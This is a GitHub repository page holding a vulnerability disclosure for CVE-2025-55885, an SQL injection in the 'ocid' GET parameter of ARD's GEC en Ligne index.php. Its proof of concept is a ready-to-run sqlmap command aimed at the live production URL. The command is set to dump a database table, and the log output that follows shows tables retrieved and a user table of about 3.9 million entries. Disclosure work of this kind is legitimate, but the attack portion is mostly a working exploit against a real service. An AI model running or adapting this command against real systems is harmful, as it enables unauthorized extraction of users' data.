Skip to content

0xZeroSec/CVE-2025-55885

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
README.md
README.md
 
 

Repository files navigation

CVE-2025-55885

Description

SQL Injection vulnerability in Alpes Recherche et Developpement ARD GEC en Ligne before v.2025-04-23 allows a remote attacker to escalate privileges via the GET parameters in index.php

Attack Vectors

SQL injection via unsanitized GET parameter ocid on https://services.ard.fr/index.php (transaction confirmation page).

Proof Of Concept

Payload

sqlmap -u "https://services.ard.fr/index.php?id=5869&ocid=183&token=1SemPugSUq3maSpK81871559797854161&transactionID=123" -p "ocid" --dbms=mysql -D ard-T [TABLE] --dump

List of Tables

[18:36:46] [INFO] retrieved: [redacted]
[18:37:15] [INFO] retrieved: [redacted]
[18:37:27] [INFO] retrieved: [redacted]
[18:37:39] [INFO] retrieved: [redacted]
[18:37:58] [INFO] retrieved: [redacted]
[18:38:15] [INFO] retrieved: [redacted]
[18:38:27] [INFO] retrieved: [redacted]
[18:38:59] [INFO] retrieved: [redacted]
[18:39:09] [INFO] retrieved: [redacted]
[18:39:30] [INFO] retrieved: [redacted]
[18:39:51] [INFO] retrieved: [redacted]
[18:40:03] [INFO] retrieved: [redacted]
[18:40:18] [INFO] retrieved: [redacted]
[18:40:35] [INFO] retrieved: [redacted]
[18:41:02] [INFO] retrieved: [redacted]
[18:41:48] [INFO] retrieved: [redacted]
[18:42:06] [INFO] retrieved: [redacted]
[18:42:23] [INFO] retrieved: [redacted]
[18:42:44] [INFO] retrieved: [redacted]
[18:43:04] [INFO] retrieved: [redacted]
[18:43:25] [INFO] retrieved: [redacted]
[18:44:01] [INFO] retrieved: [redacted]
[18:44:20] [INFO] retrieved: [redacted]
[18:44:40] [INFO] retrieved: [redacted]
[18:45:01] [INFO] retrieved: [redacted]
[18:45:13] [INFO] retrieved: [redacted]
[18:45:36] [INFO] retrieved: [redacted]
[18:45:54] [INFO] retrieved: [redacted]
[18:46:31] [INFO] retrieved: [redacted]
[18:46:56] [INFO] retrieved: [redacted]
[18:47:02] [INFO] retrieved: [redacted]
[18:47:13] [INFO] retrieved: [redacted]
[18:47:34] [INFO] retrieved: [redacted]
[18:47:58] [INFO] retrieved: [redacted]
[18:48:21] [INFO] retrieved: [redacted]
[19:45:51] [INFO] fetching entries for table '[user table]' in database 'ard'
[19:45:51] [INFO] fetching number of entries for table '[user table]' in database 'ard'
[19:45:51] [INFO] retrieved: 3904699

Reseachers

About

No description, website, or topics provided.

Resources

Readme
Activity
Custom properties

Stars

3 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors